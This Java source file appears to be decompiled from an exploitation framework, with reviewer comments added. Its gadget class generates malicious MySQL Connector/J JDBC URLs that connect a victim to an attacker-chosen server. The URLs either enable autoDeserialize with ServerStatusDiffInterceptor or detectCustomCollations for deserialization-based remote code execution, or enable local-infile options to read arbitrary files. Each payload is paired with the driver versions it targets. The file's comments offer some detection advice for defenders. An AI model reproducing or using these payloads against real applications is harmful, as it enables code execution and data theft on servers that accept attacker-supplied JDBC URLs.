package com.ar3h.chains.gadget.impl.common.jdbc;

import cn.hutool.db.dialect.DriverNamePool;
import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;

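/**
 * Gadget that renders a MySQL Connector/J JDBC URL for the selected payload type and
 * publishes the matching driver class name into the gadget context.
 *
 * <p>Every URL points the client at {@link #host} and turns on client-side driver
 * behaviour that trusts what the server sends back:
 * <ul>
 *   <li>{@code allowLoadLocalInfile} / {@code allowUrlInLocalInfile} /
 *       {@code allowLoadLocalInfileInPath}: the "read" type.</li>
 *   <li>{@code autoDeserialize}, alone or with {@code detectCustomCollations}: the
 *       "detectCustomCollations_*" types.</li>
 *   <li>{@code autoDeserialize} with {@code statementInterceptors} or
 *       {@code queryInterceptors} set to {@code ServerStatusDiffInterceptor}: the
 *       "ServerStatusDiffInterceptor_*" types.</li>
 * </ul>
 *
 * <p>Review note for defenders: an application that lets a caller supply or extend a JDBC
 * URL hands these driver properties to that caller. Build the URL from a fixed template,
 * allowlist the host, and reject or log URLs that carry the property names above; they
 * are stable strings and work as detection keys. The version ranges in the choice labels
 * are the tool's own labels and are not verified here.
 *
 * <p>NOTE(review): this listing is decompiler output. The original body switched on a
 * {@code boolean z = -1} with repeated {@code case true:} labels, which does not compile;
 * it is restored below as a plain string switch.
 */
@GadgetAnnotation(name = "Mysql JDBC URL", description = "适用于jdbc rce场景，jdbc转为Java反序列化", dependencies = {"mysql-connector-java"}, priority = 40)
@GadgetTags(tags = {Tag.MysqlJdbcUrl, Tag.JdbcUrlChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/MysqlJdbc.class */
public class MysqlJdbc implements Gadget {

    // Selected payload type; must be one of the @Choice values below.
    @Param(name = "Mysql Jdbc URL Payload 类型", type = ParamType.Choice, choices = {@Choice("read"), @Choice("detectCustomCollations_5.1.19-5.1.28"), @Choice("detectCustomCollations_5.1.29-5.1.48"), @Choice("detectCustomCollations_6.0.2-6.0.6"), @Choice("ServerStatusDiffInterceptor_5.1.11-5.x.xx"), @Choice("ServerStatusDiffInterceptor_6.x"), @Choice("ServerStatusDiffInterceptor_8.0.20")})
    public String type = "ServerStatusDiffInterceptor_5.1.11-5.x.xx";

    // Appended verbatim as the user= query parameter (not URL-encoded).
    @Param(name = "用户名", description = "通常这里用来给mysql jdbc漏洞利用工具传参，输出不同的反序列化Payload")
    public String user = "root";

    // host:port placed in the URL authority (not validated).
    @Param(name = "mysql ip:port", description = "eg: 172.16.1.2:3306")
    public String host = "172.16.1.2:3306";

    // Set as a side effect of getObject(); read by invoke(). Stays null until then.
    public String driverClassName;

    /**
     * Builds the JDBC URL for {@link #type} and records the driver class that goes with it
     * in {@link #driverClassName}.
     *
     * <p>The case-to-URL pairing was reconstructed from the order of the decompiled
     * {@code case} labels (0..6). It is consistent with the driver class each branch
     * selects, but should be confirmed against the original class file.
     *
     * @return the JDBC URL, or {@code null} if the type is unsupported and
     *         {@code ThrowsUtil.throwGadgetException} returns instead of throwing
     */
    public String getObject() {
        // Connector/J 5.x driver class; the 6.x/8.x class comes from DriverNamePool.
        final String legacyDriver = "com.mysql.jdbc.Driver";
        final String prefix = "jdbc:mysql://" + this.host + "/test?";
        final String userSuffix = "&user=" + this.user;

        // A null type is routed to the "not support" error instead of failing with a
        // NullPointerException inside the switch.
        final String selected = this.type == null ? "" : this.type;

        String url = null;
        switch (selected) {
            case "read":
                url = prefix + "allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360" + userSuffix;
                this.driverClassName = legacyDriver;
                break;
            case "detectCustomCollations_5.1.19-5.1.28":
                url = prefix + "autoDeserialize=true" + userSuffix;
                this.driverClassName = legacyDriver;
                break;
            case "detectCustomCollations_5.1.29-5.1.48":
                url = prefix + "detectCustomCollations=true&autoDeserialize=true" + userSuffix;
                this.driverClassName = legacyDriver;
                break;
            case "detectCustomCollations_6.0.2-6.0.6":
                url = prefix + "detectCustomCollations=true&autoDeserialize=true" + userSuffix;
                this.driverClassName = DriverNamePool.DRIVER_MYSQL_V6;
                break;
            case "ServerStatusDiffInterceptor_5.1.11-5.x.xx":
                url = prefix + "autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor" + userSuffix;
                this.driverClassName = legacyDriver;
                break;
            case "ServerStatusDiffInterceptor_6.x":
                url = prefix + "autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor" + userSuffix;
                this.driverClassName = DriverNamePool.DRIVER_MYSQL_V6;
                break;
            case "ServerStatusDiffInterceptor_8.0.20":
                url = prefix + "autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor" + userSuffix;
                this.driverClassName = DriverNamePool.DRIVER_MYSQL_V6;
                break;
            default:
                // driverClassName is left untouched for an unsupported type.
                ThrowsUtil.throwGadgetException("type is not support: " + this.type);
                break;
        }
        return url;
    }

    /**
     * Produces the JDBC URL and stores the driver class name in the context under
     * {@code ContextTag.DRIVER_CLASS_NAME_KEY}.
     *
     * @param gadgetContext context that receives the driver class name
     * @param gadgetChain   not used by this gadget
     * @return the JDBC URL string from {@link #getObject()}
     * @throws Exception declared by the {@code Gadget} interface
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        // getObject() must run first: it sets driverClassName as a side effect.
        String jdbcUrl = getObject();
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return jdbcUrl;
    }
}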
